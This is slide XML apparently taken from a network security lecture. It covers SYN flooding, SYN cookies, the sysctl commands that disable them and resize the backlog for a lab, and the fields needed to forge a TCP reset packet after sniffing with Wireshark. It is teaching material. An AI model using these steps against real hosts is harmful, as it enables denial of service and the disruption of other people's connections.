        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="166" name="Shape 1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Aft>
                <a:spcPts val="1200"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>The size of the queue has a system-wide setting</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-342900">
              <a:spcAft>
                <a:spcPts val="1200"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>The OS sets this value based on the amount of the memory the system has: the more memory the machine has, the larger this value will be</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-342900">
              <a:spcAft>
                <a:spcPts val="1200"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-342900">
              <a:spcAft>
                <a:spcPts val="1200"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-342900">
              <a:spcAft>
                <a:spcPts val="1200"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>How many half-open connections can be stored in the queue can affect the success rate of the attack. The size of the queue be adjusted using the following command</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>$ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>sudo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>sysctl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> -w net.ipv4.tcp_max_syn_backlog = 80</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="Picture 2"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="867079" y="2555848"/>
            <a:ext cx="5761219" cy="609653"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="264185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t> TCP Cache Issue</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="166" name="Shape 1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Aft>
                <a:spcPts val="1200"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>On Ubuntu 20.04, if before the attack, machine X has already made a telnet (or TCP connection) to the victim machine, then X seems to be “immune” to the SYN flooding attack, and can successfully telnet to the victim machine during the attack. This behavior does not exist in Ubuntu 16.04 and earlier versions</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-342900">
              <a:spcAft>
                <a:spcPts val="1200"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>TCP reserves one fourth of the backlog queue for “proven destinations” if SYN Cookies are disabled</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-342900">
              <a:spcAft>
                <a:spcPts val="1200"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
            </a:pPr>
            <a:endParaRPr lang="en-US"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43" y="3826666"/>
            <a:ext cx="5270259" cy="742209"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="16580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612F-0744-4CE2-8CAC-7833AA916CFE}"/>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The SYN Cookie Countermeasure</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Content Placeholder 4" descr="Diagram&#10;&#10;Description automatically generated">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E00B4318-7571-0AAB-4A8A-A71E726A35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1657351"/>
            <a:ext cx="5095133" cy="2743199"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="746377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Countermeasures: SYN Cookies</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="214" name="Shape 214"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="1152475"/>
            <a:ext cx="8520600" cy="38973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After a server receives a SYN packet, it calculates a keyed hash (H) from the information in the packet (including IP address, port number and sequence number) using a secret key that is only known to the server.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-342900">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPts val="1800"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>This hash (H) is sent to the client as the initial sequence number from the server. H is called SYN cookie.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-342900">
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>The server will not store the half-open connection in its queue.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-342900">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPts val="1800"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>If the client is an attacker, H will not reach the attacker.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-342900">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPts val="1800"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>If the client is not an attacker, it sends H+1 in the acknowledgement field.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-342900">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPts val="1800"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>The server checks if the number in the acknowledgement field is valid or not by recalculating the cookie.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1333442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indent="-69850">
              <a:buSzPts val="1100"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t> Turn On/Off SYN Cookie</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="166" name="Shape 1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Aft>
                <a:spcPts val="1200"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>By default, Ubuntu’s SYN flooding countermeasure (SYN cookie) is turned on</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-342900">
              <a:spcAft>
                <a:spcPts val="1200"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-342900">
              <a:spcAft>
                <a:spcPts val="1200"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-342900">
              <a:spcAft>
                <a:spcPts val="1200"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Turn off the SYN Cookie countermeasure</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>$</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>sudo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>sysctl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> -w net.ipv4.tcp_syncookies = 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84" y="1869924"/>
            <a:ext cx="5393801" cy="6615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697" y="3155639"/>
            <a:ext cx="3165063" cy="1742264"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="373558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Reset Attack</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="220" name="Shape 220"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4048500" y="1097000"/>
            <a:ext cx="4783800" cy="3917100"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="91425" tIns="91425" rIns="91425" bIns="91425" anchor="t" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" u="sng" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>To disconnect a TCP connection :</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-342900">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPts val="1800"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>A sends out a “FIN” packet to B.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-342900">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPts val="1800"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>B replies with an “ACK” packet. This closes the A-to-B communication.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-342900" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPts val="1800"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Now, B sends a “FIN” packet to A and A replies with “ACK”.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" u="sng" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Using Reset flag :</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>One of the parties sends RST packet to immediately break the connection.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="221" name="Shape 221"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="1197850"/>
            <a:ext cx="3657600" cy="346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Reset Attack</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="227" name="Shape 227"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="2684207"/>
            <a:ext cx="8520675" cy="2119683"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="91425" tIns="91425" rIns="91425" bIns="91425" anchor="t" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Goal:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> To break up a TCP connection between A and B.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Spoofed RST Packet: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>The following fields need to be set correctly:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="576263" indent="-285750">
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Source IP address, Source Port, </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="576263" indent="-285750">
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Destination IP address, Destination Port</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="576263" indent="-285750">
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Sequence number (within the receiver’s window, for our VM, the sequence number should exactly match for the attack to succeed)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="228" name="Shape 228"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1963308" y="1212183"/>
            <a:ext cx="4546501" cy="144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2AC1-758F-C9FB-8B68-6D2DE07D77DE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Constructing Reset Packet</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="9" name="Content Placeholder 8" descr="Table&#10;&#10;Description automatically generated with medium confidence">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FDA7E55D-F3C7-2F9C-DB3B-3A896E71A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247" y="2178046"/>
            <a:ext cx="4739813" cy="2565404"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Content Placeholder 4" descr="Diagram&#10;&#10;Description automatically generated">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AD5C3AFD-2BA1-023C-033A-40FA2A666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914400"/>
            <a:ext cx="4365320" cy="1263646"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1889844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Captured TCP Connection Data</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="234" name="Shape 234"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="470915" y="3355018"/>
            <a:ext cx="7749600" cy="1224298"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="91425" tIns="91425" rIns="91425" bIns="91425" anchor="t" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Steps :</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-342900">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPts val="1800"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Use </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Wireshark</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> on attacker machine, to sniff the traffic</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-342900">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPts val="1800"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Retrieve the destination port (23), Source port number and sequence number.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="5" name="Group 4"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="470915" y="1200769"/>
            <a:ext cx="7019850" cy="2073782"/>
            <a:chOff x="470915" y="1120302"/>
            <a:chExt cx="7019850" cy="2073782"/>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15" y="1120302"/>
              <a:ext cx="7019850" cy="831620"/>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5" y="1951922"/>
              <a:ext cx="7019850" cy="124216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Protocol</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="66" name="Shape 66"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="1152475"/>
            <a:ext cx="8520600" cy="3249044"/>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Transmission Control Protocol (TCP) is a core protocol of the Internet protocol suite.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-342900">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPts val="1800"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Sits on the top of the IP layer; transport layer.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-342900">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPts val="1800"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Provide host-to-host communication services for applications.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-342900">
